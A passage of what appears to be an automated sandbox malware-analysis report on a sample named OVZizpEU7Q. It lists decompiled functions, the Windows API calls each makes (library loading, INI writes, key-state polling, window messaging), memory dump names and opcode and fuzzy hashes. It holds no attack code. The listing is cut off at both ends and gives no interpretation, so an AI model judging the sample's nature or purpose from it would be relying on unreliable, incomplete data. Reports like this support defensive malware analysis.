                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 3440857362-0
                                                                                        • Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                                                        • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                                                                                        • Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                                                        • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                                                                                        Function 0047D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047D927
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0047D9AA
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0047D9C6
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0047DA07
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047DA21
                                                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 327935632-0
                                                                                        • Opcode ID: 06879a4796fb006db6701dcbeb08c84373d42f215ecc0ca78cf9e4c751ad0c13
                                                                                        • Instruction ID: 2e87ffb2dc156b6f817890f7ff3d29c7ed6bd27adfaf25e4966d104b6097512d
                                                                                        • Opcode Fuzzy Hash: 06879a4796fb006db6701dcbeb08c84373d42f215ecc0ca78cf9e4c751ad0c13
                                                                                        • Instruction Fuzzy Hash: C6512A75A00205DFCB00EFA9C4849AEB7B4FF09324B14C06AE959AB352D739AD45CF59
                                                                                        Function 0046E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1389676194-0
                                                                                        • Opcode ID: 15d6df7abba24f6c0fda673b648fc0a44ee2162c837cf8d9fdd329c326068569
                                                                                        • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                                                                                        • Opcode Fuzzy Hash: 15d6df7abba24f6c0fda673b648fc0a44ee2162c837cf8d9fdd329c326068569
                                                                                        • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                                                                                        Function 0048A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                                        • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                                                                                        • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                                        • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                                                                                        Function 00402344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 00402357
                                                                                        • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                        • String ID:
                                                                                        • API String ID: 4210589936-0
                                                                                        • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                                        • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                                                                                        • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                                        • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                                                                                        Function 004563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                                                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                                                                                        • TranslateMessage.USER32(?), ref: 0045645C
                                                                                        • DispatchMessageW.USER32(?), ref: 00456466
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                        • String ID:
                                                                                        • API String ID: 2108273632-0
                                                                                        • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                                        • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                                                                                        • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                                        • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                                                                                        Function 00458A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00458A30
                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3382505437-0
                                                                                        • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                                        • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                                                                                        • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                                        • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                                                                                        Function 0045B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 0045B204
                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                                                                                        • _wcsstr.LIBCMT ref: 0045B289
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                        • String ID:
                                                                                        • API String ID: 3902887630-0
                                                                                        • Opcode ID: 899d60c600cb03defd51949f250b9708d46bd725799c5b521baeadb23fec0c53
                                                                                        • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                                                                                        • Opcode Fuzzy Hash: 899d60c600cb03defd51949f250b9708d46bd725799c5b521baeadb23fec0c53
                                                                                        • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                                                                                        Function 0048B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2294984445-0
                                                                                        • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                                        • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                                                                                        • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                                                        • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
                                                                                        Function 00459307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                                                                                        • __itow.LIBCMT ref: 0045936A
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                                                                                        • __itow.LIBCMT ref: 004593A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow$_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2983881199-0
                                                                                        • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                                                        • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                                                                                        • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                                                        • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                                                                                        Function 004012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0040135C
                                                                                        • BeginPath.GDI32(?), ref: 00401373
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0040139C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                        • String ID:
                                                                                        • API String ID: 3225163088-0
                                                                                        • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                                                        • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                                                                                        • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                                                        • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                                                                                        Function 00464A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                                                                                        • __beginthreadex.LIBCMT ref: 00464AD8
                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                        • String ID:
                                                                                        • API String ID: 3824534824-0
                                                                                        • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                                        • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                                                                                        • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                                                        • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                                                                                        Function 00458202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                                                                                        • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 842720411-0
                                                                                        • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                                        • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                                                                                        • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                                                        • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                                                                                        Function 0045710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
